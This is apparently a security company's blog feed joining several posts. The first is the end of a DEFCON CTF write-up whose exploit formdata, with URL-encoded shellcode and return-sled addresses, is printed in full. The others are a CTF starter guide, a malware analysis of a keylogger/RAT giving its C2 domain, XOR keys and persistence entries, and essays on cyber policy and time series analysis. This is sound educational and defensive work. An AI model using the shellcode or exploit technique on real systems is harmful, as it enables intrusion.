However, when I run it outside of the debugger I get a segmentation fault. This is a common annoyance when writing exploits. Things can change when they are being debugged. I ran a strace command to see if any of the shellcode was making system calls:

$./nonameyet.cgi<formdata2old_mmap(NULL,4096,PROT_READ|PROT_WRITE,MAP_PRIVATE|MAP_ANONYMOUS,0,0)=0xb76ff000---SIGSEGV{si_signo=SIGSEGV,si_code=SEGV_MAPERR,si_addr=0xb7fda108}---+++killedbySIGSEGV(coredumped)+++

Nope, I never got execution. With si_addr=0xb7fda108 I am at least still jumping to the correct spot. What I notice is that the mmap call is returning 0xb76ff000. This is not what I was seeing as a consistent address for my data on the 0xb7fda000 page. So, that address does not exist and we need to go back to pick one of the other two points where we have code. Let’s pick the heap this time with an address of 0x080501b8 as our new EIP.

After modifying the formdata file again and setting a break point on the return from the interesting function, it looks like the heap address has moved as well. It is now at [heap] : 0x8050318 (“AAAABBBBCCCCDDDDEEEEFF”). I suggest that this changed because our input lengths have changed since I last looked. I’ve added shellcode now after all.

The base address for the heap is still in the same spot: 0x08050000. It is just the offset within that page that has shifted. Let’s put in the new address for EIP and try our luck with yet another run. The other thing that is different about this heap location is that all of our data has already been URL decoded. Thus, we will need to URL encode all of our binary values. This includes the shellcode.

This time it hits a SIGTRAP again and we can redo our relative short jump calculation jump to land on arbitrary shellcode. We are executing at 0x08050318 and we need to jump to 0x08050352, or 58 bytes away, which means we should us an opcode of “\xeb\x38”. Setting this at the start jumps perfectly to our shellcode, which now executes just fine in the debugger. Again.

But, once again, running without the debugger attached produces a crash! It appears that the heap moves as well. This makes logical sense. If the mmap call is moving and the heap is allocated in a similar way, then they both should move with ASLR. We could try the stack location by building in a large NOP (\x90) sled before our shellcode and go about guessing stack addresses despite ASLR, brute forcing the return address used for EIP. I’ve shamefully used this technique in past CTF events with success.

The whole problem here, and the reason I’ve failed to exploit twice, is that GDB has disabled ASLR. Remember when I checked it earlier? I could have saved myself a lot of time if I had realized this back then. While having your debugger turn off ASLR makes debugging easier, it leads to false hope. Let this be a lesson to always run the set disable-randomization off command in GDB when starting exploit development on a binary. I believe this default ASLR disabled state is actually coming from the PEDA GDB init script I am using. I have another idea that should work with ASLR.

Remember that data structure passed into the interesting function? Well, there is no reason why we only have to fill out the “filename” and “time” variables. If we set the “date” variable there will be a pointer to the date value on the stack. We can put our shellcode in there and use a technique called a return sled to get down the stack.

Here is a short debugging session showing the stack at the beginning of the interesting function:

$gdb./nonameyet.cgiReadingsymbolsfrom./nonameyet.cgi...(nodebuggingsymbolsfound)...done.gdb-peda$break*0x0804CE3BBreakpoint1at0x804ce3bgdb-peda$setargs<formdata3gdb-peda$rBreakpoint1,0x0804ce3bin??()gdb-peda$stack200000|0xbffff63c-->0x80492eb(testeax,eax)#returnaddressinmain()0004|0xbffff640-->0xbffff65c-->0x80500a0("%Time%")0008|0xbffff644-->0xbffff68c-->0xe0012|0xbffff648-->0xffffffff0016|0xbffff64c-->0x10020|0xbffff650-->0xb7e2bb98-->0x2a5c('\\*')0024|0xbffff654-->0xb7fdc858-->0xb7e1f000-->0x464c457f0028|0xbffff658-->0xbffff866("/home/bool/nonameyet.cgi")0032|0xbffff65c-->0x80500a0("%Time%")0036|0xbffff660-->0x70040|0xbffff664-->0x00044|0xbffff668-->0x00048|0xbffff66c-->0x80501b8-->0x414138eb#thisisthetimevariable0052|0xbffff670-->0x3b(';')#timevariablelength0056|0xbffff674-->0x8050348-->0xf0ec8166#datevariable0060|0xbffff678-->0x54('T')#datevariablelength0064|0xbffff67c-->0x00068|0xbffff680-->0x00072|0xbffff684-->0x00076|0xbffff688-->0x0gdb-peda$

If we replace our original return address with 0x08048945 (the address of a ret instruction) and then immediately following this address place the same address again, the program will return twice and the stack will be incremented by 8. We can do this all the way down the stack until we reach our pointer to the date variable. A little math tells us (0xbffff674 - 0xbffff63c) / 4 that we need to put the pointer to the ret instruction on the stack 14 times to reach the pointer to our shellcode.

One problem. When I go to edit the time variable I see that we have &l;teip> then <bss> address in the time variable. This was required to survive the write from earlier. I will not be able to write to the text section of the binary so I cannot use this address for the ret sled. Because the number of addresses is even, I can point the return sled to a pop ret gadget and have a pop/ret sled instead. There is a pop just one byte before the previous ret address at 0x08048944. I will still need to put this address in 14 times but every other instance will not be executed.

My first attempt at this failed as well! When I looked at the stack, the pointer for the “date” variable was not where it should be. The length was correct but we were returning into NULLs. Looking a little closer, I noticed that the pointer for this variable ended with 0x00. Of course, the time variable was null terminating on the stack. My length was off by one. Since I am already doing a pop/ret sled the pointer immediately before the date pointer is not executed. It could really be anything. I made the time variable one byte shorter and FINALLY gained code execution outside of a debugger. Here is the completed formdata file and execution printing out /home/nonameyet/flag:

$catformdata-----------------------------13141138687192Content-Disposition:form-data;name="photo";filename="%25Time%25"Content-Type:application/octet-streamfilecontents-----------------------------13141138687192Content-Disposition:form-data;name="time"%eb%38AABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMM%44%89%04%08%EC%F0%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04-----------------------------13141138687192Content-Disposition:form-data;name="date"%66%81%EC%F0%01%83%E4%F8%EB%30%5E%89%F3%31%C9%31%C0%B0%05%CD%80%89%C3%89%F1%31%D2%B2%FF%31%C0%B0%03%CD%80%BB%FF%FF%FF%FF%F7%DB%89%F1%88%C2%31%C0%B0%04%CD%80%31%C0%B0%01%CD%80%E8%CB%FF%FF%FF%2F%68%6F%6D%65%2F%6E%6F%6E%61%6D%65%79%65%74%2F%66%6C%61%67%00-----------------------------13141138687192--$./nonameyet.cgi<formdataAngryRhinocerosAndthenIfoundfivedollars.

The only thing left to do is to send this over a socket to the web server so that I can pull back the flag on the remote system. Too bad the service was offline by the time I completed the challenge.

There are other ways to go about landing this stack overflow. Another public write up is here (in Chinese). It looks like this team made a ROP chain to getenv() that would read in cookie data. The same stack overflow bug was used.

Big thanks to HJ and Legit BS for a fun CTF problem. I spent way too much time playing with it. If you enjoyed this walk through or have questions or comments, you are welcome to email me: svittitoe at endgame.com.

How to Get Started in CTF

$
0
0

Over the past two weeks, I’ve examined two different problems from the DEFCON 22 CTF Qualifications: “shitsco” and “nonameyet”. Thank you for all of the comments and questions. The most popular question I received was “How can I get started in CTFs?” It wasn’t so long ago that I was asking myself the same thing, so I wanted to provide some suggestions and resources for those of you interested in pursuing CTFs. The easiest way to start is to sign up for an introductory CTF like CSAWPico CTF,Microcorruption, or any of the other dozens available. Through practice, patience, and dedication, your skills will improve with time.

If you’re motivated to take a crack at some of the problems outside of the competition setting, most CTF competitions archive problems somewhere. Challenges tend to have a wide range of difficulty levels as well. Be careful about just picking the easiest problems. Difficulty is subjective based on your individual skillset. If your forte is forensics but you are not skilled in crypto, the point values assigned to the forensics problems will seem inflated while the crypto challenges will seem undervalued to you. The same perception biases hold true for CTF organizers. This is one reason why assessing the difficulty of CTF problems is so challenging.

If you’ve tried several of the basic problems on your own and are still struggling, then there are plenty of self-study opportunities. CTF competitions generally focus on the following skills: reverse engineering, cryptography, ACM style programming, web vulnerabilities, binary exercises, networking, and forensics. Pick one and focus on a single topic as you get started.

1) Reverse Engineering. I highly suggest that you get a copy of IDA Pro. There is a free version available as well as a discounted student license. Try some crack me exercises. Write your own C code and then reverse the compiled versions. Repeat this process while changing compiler options and program logic. How does an “if” statement differ from a “select” in your compiled binary? I suggest you focus on a single architecture initially: x86, x86_64, or ARM. Read the processor manual for whichever one you choose. Book recommendations include:

2) Cryptography. While this is not my personal strength, here are some resources to check out:

3) ACM style programming. Pick a high level language. I recommend Python or Ruby. For Python, read Dive into Python (free) and find a pet project you want to participate in. It is worth noting that Metasploit is written in Ruby. Computer science classes dealing with algorithms and data structures will go a long way in this category as well. Look at past programming challenges from CTF and other competitions – do them! Focus on creating a working solution rather than the fastest or most elegant solution, especially if you are just getting started.

4) Web vulnerabilities. There are many web programming technologies out there. The most popular in CTF tend to be PHP and SQL. The php.net site is a fantastic language reference. Just search any function you are curious about. After PHP, the next most common way to see web challenges presented is with Python or Ruby scripts. Notice the overlap of skills? There is a good book on web vulnerabilities, The Web Application Hacker’s Handbook. Other than that, after learning some of the basic techniques, you might also think about gaining expertise in a few of the more popular free tools available. These are occasionally useful in CTF competitions too. This category also frequently overlaps with cryptography in my experience.

5) Binary exercises. This is my personal favorite. I recommend you go through reverse engineering before jumping into the binary exercises. There are a few common vulnerability types you can learn in isolation: stack overflowsheap overflows, and format string bugs for starters. A lot of this is training your mind to recognize vulnerable patterns. Looking at past vulnerabilities is a great way to pick up these patterns. You should also read through:

6) Forensics/networking. A lot of CTF teams tend to have “the” forensics guy. I am not that guy, but I suggest you learn how to use the 010 hex editor and don’t be afraid to make absurd, wild, random guesses as to what could be going on in some of these problems.

Finally, Dan Guido and company recently put out the CTF field guide, which is a great introduction to several of these topics.


Cyber and Strategic Landpower: Three Big Questions

$
0
0

Yesterday, I was the tech company voice on a panel with senior military officers, including LTG Edward Cardon, commander of the U.S. Army Cyber Command. Our topic was the role of cyber in support of strategic landpower, and the discussion (which was great) boiled down to three big issues for me:

  • What vulnerabilities will exist in the future force,
  • How can we ensure resilience in the face of those vulnerabilities, and
  • How can the Army build a culture that’s agile enough to succeed in the cyber world?

So here are some brief thoughts:

  • Vulnerabilities. For more than 25 years the military has talked about variations on the theme of total battle-space awareness – of increasing soldiers’ and commanders’ situational awareness by turning every platform (and I include individual people as platforms in this sense) into sensors. Military platforms are increasingly walking IP addresses, walking sensors, covered with radios, cameras, interactive maps, and – eventually – wearables and embedded technologies. Think of all these endpoints as cavalry doing constant reconnaissance, and that presents both huge opportunities for data collection and awareness and some significant vulnerabilities given these connections and our increasing reliance on them.
  • Resilience. Building secure systems is obviously essential, as is visualization so you can detect before deciding whether/how to respond, but really getting to “mil-spec” in this sense requires significant human components in addition to the technical ones. It’s useful to look to history when we talk about resilience for the military. I’d argue that we’ve always had some basic tenets of what constitutes resilience, and those are still useful here:
    • Excellence in the fundamentals. Land warfare hasn’t changed all that much since Thucydides; when the GPS fails, you still better know how to use a map and compass, and when the cyber systems fail, you still better know how to use a knife (hyperbolic, but making a point here…)
    • Jointness. Since Murphy’s Law always rules on the battlefield, we need to ensure one standard, one language, and maximum interoperability of systems. Remember that U.S. failures in Grenada in 1983 were a great catalyst for Goldwater Nichols and the forced integration of the “Joint era.” We have a largely green-field opportunity now to build our cyber forces the right way from the start – emphasizing openness, ease of use, interoperability, and the ability to scale.
    • Training exercises. Only through rapid real-world iteration can we even begin to understand what resiliency looks like, and of course there’s no substitute for turning the map around and seeing what our cyber attack surface looks like from the adversary’s perspective. From a utility standpoint, therefore, there’s pretty significant convergence between offensive and defensive cyber capabilities for government actors – we can use offensive capabilities and learnings to test and strengthen our defenses.
  • Culture. This is where I feared being the skunk at the picnic. Having commanded military units in combat and now running a venture-backed software company, I’ve lived on both sides of the cultural chasm. So while I start with a basic skepticism about the military’s ability – culturally – to recruit and retain great cyber talent, I do think there are some things that can be done to better the odds:
    • First, we need to fix the acquisition process for software products or else we will effectively take the most innovative private sector solutions off the table. This should not be as hard as it seems. In terms of overall dollars, capital intensiveness, and program duration, software products are small projects compared with building ships and jets. I cannot speak to the legal and bureaucratic aspects of this change, but I did make one point about it from a philosophical perspective: the military must stop equating capability with cost – better stuff need not be more expensive stuff! Use the budgetary pressure of this downturn to replace the products and people that don’t work. And, unlike with massive systems, where I understand the need for some developmental burden-sharing, with most software products the vendors — not the government — should assume the technical and financial risk.
    • Second, we need to understand that cyber has a different talent base…but motivated by the same intangibles. You need to look for talent in different places (not always high school football teams), hold them to different standards (it doesn’t matter how many pull-ups they can do), and probably ought to consider tailored workplace cultures (0600 formation isn’t going to work in your favor). But they’re smart and committed, and they – like everyone else who takes that oath – will be forgoing other options and choosing public service because they believe in this country, they believe in their mission, and they believe in their comrades.
    • Third, we need to force the seniors to get granular. Waving hands about “all this cyber stuff” won’t cut it. Everyone in the room who wasn’t born digital is fooling himself or herself to think you can get where you need to be without making a commitment similar to that made by Captain Bull Halsey when he went to flight school because he and others saw the writing on the wall about the future of aviation for the Navy. We cannot afford to have a gap of another 10 or 20 years before we have enough granular understanding of cyber in the senior ranks.

Technical Analysis: Binary b41149.exe

$
0
0

In keeping with the theme of my previous post, “malware never truly dies – it just keeps on compromising”, today I’d like to investigate a binary that surfaced a couple of months ago. While the binary itself is young, the domain it reaches back to for Command and Control (CnC) has been used by nefarious binaries - like Cryp_SpyEye, AUTOIT.Trojan.Agent-9 and TROJ_SPNR - since at least October 2012. Hence, this is another example of how “old” malware continues to compromise long after it has been discovered.

What really caught my eye about this binary was one of its obfuscation techniques. The literal file name of the binary is unknown, so for the purposes of examining it, I renamed it b41149.exe, which are the first six characters of its SHA256 hash. The complete hash will be provided later in the file identifier section.

An initial look at b41149.exe revealed it to be a custom-packed binary with an internal file name of “microsft.exe”, complete with a Microsoft icon (see Figure 1).


Figure 1: Binary Icon

Even more interesting was an embedded JPEG at offset 11930A. As of this writing, no purpose for this JPEG has been uncovered. Could this be some type of calling card? Figure 2 reflects the embedded JPEG in a hex view while Figure 3 displays the actual image file.


Figure 2: Hew View of Embedded JPEG


Figure 3: Embedded JPEG Inside b4119.exe

Another curious aspect of b41149.exe, and undoubtedly much more important than the JPEG, was the fact that it contained a Unicode-encoded binary between offset 508B and offset 117C0A. This is the part that really caught my eye. I’ve seen embedded binaries obfuscated in this manner primarily in RTF files, and also in PDFs and DOCs, but I personally haven’t come across one yet that used this obfuscation scheme while embedded inside another binary. It turns out the embedded binary is the real workhorse here, and Figure 4 reflects how it appears inside b41149.exe.


Figure 4: Unicode-encoded Binary Inside b4119.exe

B41149.EXE in Runtime

Upon execution, b41149.exe self-replicates to C:\WINDOWS\System32\mony\System.exe with hidden attributes. In addition, a visibly noticeable command shell is opened. System.exe, the malware’s running process, then hooks to the malware-spawned command shell. However, upon reboot, System.exe hooks to the default browser rather than a command shell, but since the browser window isn’t opened this would not be visibly noticeable to the affected user. Additionally, during runtime, b41149.exe self-replicates to six other locations throughout the system and creates one copy of itself that has the following 10 bytes appended to it - 0xFE154DE7184501CD2325. The binary also sets several registry value keys and stores encoded keylog data as logs.dat in the logged on users %AppData% folder. Once loaded, the running process attempts to connect to a.servecounterstrike.com over port 115, and it persists on a victim host through a registry RUN key as well as on a copy of the binary in Start Up. The following table provides a chronological gist of the malware on a victim host during runtime.




Table 1: Chronological Gist of Malware on an Infected Host

As previously stated, the Unicode-encoded binary embedded inside b41149.exe (reflected in Figure 4) is the real power of this malware - it does all the heavy lifting. As a stand-alone binary, it will do everything described in Table 1, except the self-replications, other than to %System%\mony\System.exe. In light of this, the remaining code in b41149.exe appears to be responsible for the other self-replications. However, before the embedded binary is functional (as a stand-alone), the PE Header must be fixed and 1,391 4-byte blocks of 0x00002000 must be removed. These 4-byte blocks of ‘filler’ are inserted every 400 bytes. The exact reason for this is unknown, but I would guess it’s to hinder reversing efforts. Once fixed, however, the binary will run independently and without any degradation of maliciousness.

The keylogged data file, logs.dat, is encoded with a 30-byte key, but not in its entirety. Each new process, such as notepad, a command shell, browser, etc., spawns a new line of keylogged data. And each line is delimited with #### (or 0x23232323). The key is then applied to each new line, following the delimiter. Deep dive analysis has not yet been done to uncover the actual encoding algorithm or loop. However, the encoded logs.dat file can be decoded by applying the following 30-byte key after each delimiter: 0E0A0B16050E0B0E160A05020304040C010B0E160604160A0B0604130B16. Figure 5 contains a hex view sample of the encoded logs.dat file.


Figure 5: Hex View of Encoded Keylogged Data in LOGS.DAT

The following table demonstrates the decoding process for the first line of logs.dat. Each encoded byte is XOR’d with its corresponding byte from the key, producing the decoded byte. For example 0x75 XOR with 0x0E becomes 0x7B; or in ASCII, U becomes {.


Table 2: Keylogger Decoding Scheme

Since the encoded line in Table 2 was only 9 bytes long, only the first 9 bytes of the key were utilized. However, the key does not resume from byte 10 on the next line of encoded text. It starts back from the beginning of the key (e.g. 0x0E0A0B, etc.) and it will repeat itself until that line of data concludes. To illustrate this further, the following table presents three different lines of encoded ASCII text followed by its decoded version. The alphabetic characters of the decoded text are upper case/lower case inverted, while the numeric and special characters are displaying normally.


Table 3: Decoded Keylog Data

The most critical component of this malware runs in memory, but it’s written to disc ever so briefly by b41149.exe. The temporary file, “XX—XX—XX.txt”, is resident on the system for only a fraction of a second in the logged-on user’s %Temp% directory. Once running, the malware-spawned command shell deletes it (as reflected above in Table 1). XX—XX—XX.txt is XOR encoded with 0xBC, and once decoded, it contains the name of the reach back CnC domain a.servecounterstrike.com, as well as a UPX-packed dynamic link library (DLL) file. Strings of the DLL suggest it contains remote access tool (RAT) capability. In addition, since the DLL runs in memory, and XX—XX—XX.txt does not remain resident on the victim host, its presence could be difficult to determine.

The beginning of XX—XX—XX.txt displays the un-encoded file structure path from where the malware was executed. This string is followed by the path of the running process, which is the self-replicated System.exe. Immediately after is where the XOR encoded CnC reach back domain and the connection port are located. A single byte XOR key, 0xBC, is used for this, and Figure 6 reflects a “before and after” encoding look at the beginning portion of XX—XX—XX.txt.


Figure 6: XX—XX—XX.txt Before and After Encoding

The DLL embedded inside XX—XX—XX.txt is near offset 1C192, but this is dependent upon the length of the path name from which the malware was executed. Figure 7 reflects a “before and after” encoding look at the embedded DLL’s DOS stub.


Figure 7: XOR Encoded DOS Stub Inside XX—XX—XX.TXT

As stated above, the DLL is UPX packed, but once unpacked, it reveals some interesting strings that provide some insight into its functionality. Table 4 lists some strings of interest.


Table 4: Strings of Interest

Persistency is a key component of malware, and b41149.exe persists on the victim host through several mechanisms, such as the following registry RUN keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\Policies:"C:\WINDOWS\system32\mony\System.exe"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HKLM:"C:\WINDOWS\system32\mony\System.exe"

In addition, a copy of the binary is stored in the user’s start up folder as WinUpdater.exe. However, 10 bytes are appended to the binary as shown in figure 8.


Figure 8: Trailing Byte Comparison of B41149.EXE / WINUPDATER.EXE

An autorun.inf file is also created in the root of the C:\ directory. Below is the content of the INF file, which opens apphelp.exe - also located in the root of C.

[autorun]open=apphelp.ACTION=PerformaVirusScan[autorun]open=apphelp.ACTION=PerformaVirusScan

One unusual aspect of this malware is that while the main action takes place in memory, it is actually very noisy in terms of activity on the victim host. It writes, deletes, then rewrites two files in rapid succession to the logged-on user’s %Temp% directory. The files are XxX.xXx and UuU.uUu. Each file contains the current timestamp of the victim host in an HH:MM:SS format. No other data is contained within those files. Interestingly, XxX.xXx is rewritten at half-second intervals, while UuU.uUu is rewritten every five seconds. Figure 9 displays the contents of these files captured moments apart from one another.


Figure 9: Content of XXX.XXX AND UUU.UUU

The most obvious sign of something being not quite right here is that upon execution, this binary spawns a command shell window for the user and everyone else to see. The shell is not a user interactive, because it cannot be typed in. However, if the shell is closed (or terminated), the malicious process, C:\WINDOWS\system32\mony\System.exe, restarts automatically. Interestingly, upon system reboot, the malicious process System.exe hooks to the default browser and runs as previously described, but it does not spawn a browser window. It’s possible that the visual command shell window is intended to trick the user into thinking there’s something wrong with the system, thus prompting a reboot.

Network Activity

As previously stated, the binary connects to a.servecounterstrike.com, which is compiled in memory. Upon execution of the binary, the victim host sends a DNS query for a.servecounterstrike.com, and once an IP address is returned, begins sending periodic SYN packet to the returned IP address over port 115, presumably until the attacker responds or until it receives further command from its CnC node. Figure 10 shows the PCAP of a compromised host’s initial connection with the malicious domain. This activity was captured from within an enclosed virtual network.


Figure 10: Initial Connection from a Compromised Host

During the short period in which the compromised virtual machine was left online, no return attacker activity occurred, so it’s undetermined what would transpire in the long term if this were an actual compromised online host.

Stay tuned for a follow-up post once I do some deeper dive analysis of this binary. For now, I’ll leave you with some hashes. Enjoy.

File Identifiers

File: b41149.exe Size: 1343488 MD5: f20b42fc2043bbc4dcd216f94adf6dd8 SHA1: 4d597d27e8a0b71276aee0dcd8c5fe5c2db094b0 SHA256: b41149a0142d04ac294e364131aa7d8b9cb1fd921e70f1ed263d9b5431c240a5 ssdeep: 6144:hEnCDKEJkKspH02n/M+WJ/04KLuqju11M+HDKsR:h9DdspH02004fqjujM+HGs Compile Time: 4F605417 (Wed, 14 March 2012 08:17:27 UTC) Compile Version: Microsoft Visual Basic 5.0 / 6.0 Internal File Name: Microsft.exe

File: embedded_ascii-encoded_bianry.exe (with fixed PE Header and “filler” byte blocks removed) Size: 277869 MD5: a47d9f42a1a1c69bc3e1537fa9fa9c92 SHA1: b2d588a96e29b0128e9691ffdae0db162ea8db2b SHA256: c17cb986ccd5b460757b8dbff1d7c87cd65157cf8203e309527a3e0d26db07e3 ssdeep: 6144:8k4qmyY+DAZCgIqiEM3OQFUrsyvfEUKMnqVZ:P9wQuCvjdordEGn6

File: c:\WINDOWS\system32\mony\System.exe (dropped by embedded Unicode encoded binary) Size: 277869 MD5: a47d9f42a1a1c69bc3e1537fa9fa9c92 SHA1: b2d588a96e29b0128e9691ffdae0db162ea8db2b SHA256: c17cb986ccd5b460757b8dbff1d7c87cd65157cf8203e309527a3e0d26db07e3 ssdeep: 6144:8k4qmyY+DAZCgIqiEM3OQFUrsyvfEUKMnqVZ:P9wQuCvjdordEGn6

File: embedded DLL in XX–XX–XX.txt Size: 120320 MD5: c1bc1dfc1edf85e663718f38aac79fff SHA1: 9d01c6d2b9512720ea7723e7dec5e3f6029aee3d SHA256: 5468be638be5902eb3d30ce8b01b1ac34b1ee26b97711f6bca95a03de5b0db24 ssdeep: 3072:dk7/I/KbMm4oIP9zaj1WyWBiyhdYKC0iwsUukhh3a:dkDuK4m4jWjv+nCksfQB

File: embedded DLL in XX–XX–XX.txt (unpacked) Size: 329728 MD5: f920cee005589f150856d311b4e5d363 SHA1: 2589fa5536331a53e9a264dd630af2bdb6f6fc00 SHA256: 1fd16ca095f1557cc8848b36633d4c570b10a2be26ec89d8a339c63c150d3b44 ssdeep: 6144:iQoh1rcU8kHOEkzsz+F97pk1nJJn7TB82R:j2RbHOEkzsaXmxn7T

The Great Divide: Closing the Gap in Cyber Analysis

$
0
0

In 2010, General Michael Flynn co-authored a report entitled Fixing Intelcritiquing the threat-centric emphasis within counterinsurgency intelligence analysis. The report, which made waves in the intelligence community (IC), called for an organizational and cultural shift within the analytical and operational approach to counterinsurgency, highlighting the gap in data collection and the resulting lack of holistic situational awareness critical for decision-making. Recently, the Chief Analytic Methodologist at DIA, Josh Kerbel, reinforced these arguments while extending them beyond counterinsurgency to apply to all missions across the IC writ large. Noting that the IC is at a Kodak moment, he argues that the IC must move beyond the Cold War business model and modernize in light of the dynamic and diverse threats present in the current operating environment.

Having spent a significant amount of time both as an analyst and interviewing analysts across a wide range of intelligence agencies and Combatant Commands, I now see significant parallels within the cyber domain. While cyber is a much more nascent field, it is already widely recognized that there is a gap between the very tactical and technical nature of the cyber domain and the information relayed to leadership. The DoD’s inclusion of cyberspace as an official domain of warfare certainly indicates its relevance for the foreseeable future and there are plenty of lessons to learn, both from the CT realm as well as from the larger IC perspective, in order to make cyber analysis relevant for leadership. Two of the most pertinent lessons, which I’ll address in further detail, are: 1) contextualizing challenges and 2) translation between practitioners and leadership.

1) Contextualization: As both Kerber and the Flynn report note, for more than a decade the IC has been preoccupied with a threat-centric view of terrorism, which in turn focuses on targeted collection. Similarly, the cyber domain currently seems to take a threat-centric approach, again with an emphasis on targeted collection. In both cases, an emphasis on the nodes omits the larger picture that leadership requires to make informed decisions. It is indicative of the proverbial inability to see the forest for the trees. Nevertheless, cyber intelligence should cross the strategic, operational, and tactical domains to provide insight at each level of analysis. There is great utility in both private and public organizations understanding the larger picture and context of the cyber challenges within the operating environment.

2) Translation required: Kerber emphasizes the behavioral component of customer-driven production, noting analysts must understand what the policymakers are trying to accomplish and provide a service that meets those needs. This, he argues, is counter to the current strategy of assuming relevance of a product because it is based on unique information. This is identical to the disciplinary gaps seen today in the cyber domain. Too often, the hyper-technical delivery of cyber information and analysis to leadership is packaged in a language and format that quite simply are not useful for decision makers. Insights from cyber analysis will not reach their full potential if we cannot transform the technical jargon into a language that leaders can understand. Fixing Intel notes that the IC “is a culture that is strangely oblivious of how little its analytical products, as they now exist, actually influence commanders.” This gap arguably already haunts the cyber domain, where very technical products are either not directly relevant for or are incomprehensible to leadership. Until this necessary translation happens, and until we can move towards a common framework for the cyber domain, the divide between the cyber analysis and policy communities, and between leadership and cyber practitioners, will remain.

Analysis: Three Observations About the Rise of the State in Shaping Cyberspace

$
0
0

Last month commemorated the 100th anniversary of the start of World War I. It was a time when states were so interdependent and borders so porous that some call it the first era of globalization. In fact, immediately prior to World War I, many forecast that interdependence would be the predominant driving force for the foreseeable future, diminishing states’ tendencies toward war and nationalism. World War I immediately halted this extensive global interdependence, in large part due to rising nationalism and the growth of inward-facing policies. On the surface, there seems to be little in common between that era and the current Digital Age. However, the misguided presumption prior to World War I that interdependence would render states’ domestic interests obsolete is at risk of resurfacing in the cyber domain. Given the narrow focus on connectivity during previous waves of interdependence, here are three observations about the role of the state in the Digital Age worth considering:

1) In “borderless” cyberspace, national borders still matter. Similar to perspectives on the growth of interdependence prior to World War I, there is currently an emphasis on the borderless, connected nature of cyberspace and its uniform and omnipresent growth across the globe. While borders – both virtual and physical – have become more porous, the state nevertheless is increasingly impacting the structure and transparency of the Internet. From Russia’s recent expansion of web control to Brazilian-European cooperation for underground cables, there is a growing patchwork approach to the Internet – all guided by national interests to maintain control within state borders.

2) “Data Nationalism” is the new nationalism of the Digital Age. While traditional nationalism still exists, thanks to the information revolution it now manifests in more nuanced ways. “Data nationalism”, where countries seek to maintain control of data within their physical borders, has strong parallels to traditional nationalism. In both cases, nationalism serves as a means to shape and impact a state’s culture and identity. As history has shown, states – and the governments running them – aim to maintain sovereign control of their territory and stay in power. Nationalistic tendencies, especially state preservation, tend to strongly influence the depth and structure of connectivity among people and states. This was true one hundred years ago, and it is true today. States are disparately invoking national legislation and barriers to exert their “data nationalism” within a virtual world, possibly halting the great expansion of access and content that has occurred thus far. Just as nationalism and states’ interests eventually altered the path of the first era of globalization, it is essential to acknowledge the growing role of the state in shaping the Internet during the Digital Age.

3) Although a technical creation, the cyber domain is not immune from the social construct of states’ interests. During each big wave of globalization and technological revolution, the idea that interdependence will triumph and trump individual states’ interests emerges. However, this idea discounts the role of the state in continuing to shape and maintain sovereign control while simultaneously influencing the structure of the newly connected system. This is true even in the cyber realm, which is not immune to the self-interest of states. From the great firewall of China to various regulations over content in Western European countries to Internet blackouts in Venezuela, states are increasingly leveraging their power to influence Internet access and control data and content within their borders. This has led to a growing discussion of the “Splinternet” or Balkanization of the Internet, which refers to the disparate patchwork of national policies and regulations emerging globally. Running counter to the ideals of openness and transparency on which the Internet was founded, it comes as no surprise to international relations scholars that states would seek to control (as best as possible) the cyber domain.

The role of self-interested states has largely been absent from discussions pertaining to the future of the Internet. Fortunately, there is a growing dialogue on the impact of national barriers and disparate national legislation on the Internet’s evolution. A recent article in The Atlantic reflects on the growing fractionalization of the Internet, and is reminiscent of earlier eras’ articles about the hub-and-spoke system of international trade. Similarly, aPew Research Center poll highlights concern over the potential fractionalization of the Internet due to state intervention. As we continue to consider how the Internet will evolve and how policymakers will respond to an increasingly interconnected digital domain, we must not ignore the inherent tendency of states to demarcate both physical and virtual control within their sovereign borders.

 

Time Series Analysis for Network Security

$
0
0

Last week, I had the opportunity to attend a conference that had been on my radar for a long time. I’ve been using scientific Python tools for about 10 years, so it was with great excitement that I attended SciPy 2014 in Austin. I enjoyed meeting the developers of this excellent open-source software as well as other enthusiastic users like me. I learned a great deal from talks about some Python tools I haven’t yet tried but should really already be using, like condabokeh, and others. I also gave a talk describing how I have been using the SciPy stack of software in my work here at Endgame. In this post, I’ll summarize and expand on the first half of my presentation.

My work at Endgame has focused on collecting and tracking metrics associated with network and device behavior. By developing a model of normal behavior on these metrics, I can find and alert users when that behavior changes. There are several examples of security threats and events that would lead to anomalies in these metrics. Finding them and alerting our users to these threats as soon as possible is critical.

The first step in finding anomalies in network and device behavior is collecting the data and organizing it into a collection of time series. Our data pipeline here at Endgame changes rapidly as we develop tools and figure out what works and what doesn’t. For the purposes of this example, the network traffic data flows in the following way:

Apache Kafka is a distributed messaging system that views messages as a log. As data comes in, Kafka takes care of receiving it and distributing it to other systems that have subscribed to it. A separate system archives this data to HDFS for later processing over historical records. Reading the data from the Kafka servers allows my database to stay as current as possible. This allows me to send alerts to users very soon after a potential problem occurs. Reading historical data from HDFS allows me to backfill metrics once I create a new one or modify an existing one. After all of this data is read and processed, I fill a Redis database with the time series of each metric I’m tracking.

The three Python tools that I use throughout this process are kairos to manage the time series database, kafka-python to read from Kafka, andpyspark to read from HDFS. I chose each project for its ease of use and ability to get up to speed quickly. They all have simple interfaces that abstract away complicated behavior and allow you to focus on your own data flow. Also, by using a Python interface to old and new data, I can share the code that processes and compares data against the metrics I’ve developed.

I gave my presentation on the third and final day of SciPy. Up until that point, I hadn’t heard Apache Spark or pyspark mentioned once. Because of this, I spent an extra minute or two evangelizing for the project. Later, the Blaze developers gave a similar endorsement. It’s good to know that I’m not alone in the scientific Python community in loving Spark. In fact, before using Spark, I had been running Pig scripts in order to collect historical data. This required a bunch of extra work to run the data through the Python processing scripts I had already developed for the real-time side of things. Using Spark definitely simplified this process.

The end result of all this work is an easily accessible store of all the metrics. With just a couple lines of code, I can extract the metric I’m interested in and convert it to a pandas Dataframe. From there, I can simply analyze it using all of the scientific computing tools available in Python. Here’s an example:

